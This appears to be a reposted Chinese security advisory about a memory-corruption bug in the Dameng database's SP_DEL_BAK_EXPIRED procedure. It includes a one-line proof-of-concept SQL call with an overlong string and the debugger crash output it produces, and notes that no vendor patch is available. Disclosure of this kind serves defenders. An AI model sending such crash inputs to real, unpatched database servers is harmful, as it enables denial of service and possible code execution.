达梦数据库SP_DEL_BAK_EXPIRED过程内存破坏漏洞

发表评论 (0) 查看评论

受影响系统:

达梦数据库有限公司 达梦数据库

描述:

达梦数据库是完全国产的数据库系统。

达梦数据库的SP_DEL_BAK_EXPIRED调用过程存在内存破坏漏洞,通过认证的用户可以以超长参数调用该过程导致拒绝服务或执行任意代码。

<*来源:Shennan Wang (wsn1983@gmail.com
  
  链接:http://marc.info/?l=bugtraq&m=127531903530927&w=2
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

CALL SP_DEL_BAK_EXPIRED(‘AAAAAAAAAAAAAAAAAAAA’, ”);

(458.5fc): Access violation – code c0000005 (!!! second chance !!!)

eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c

eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246

*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll

*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll –

wdm_dll+0xd1753:

100d1753 f2ae repne scas byte ptr es:[edi]

0:009> da ebp

074ed1fc "AAAAAAAAAAAAAAAAAAAA"

建议:

厂商补丁:

达梦数据库有限公司
——————
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dameng.com/dmweb/welcome.do

发表评论?

0 条评论。

发表评论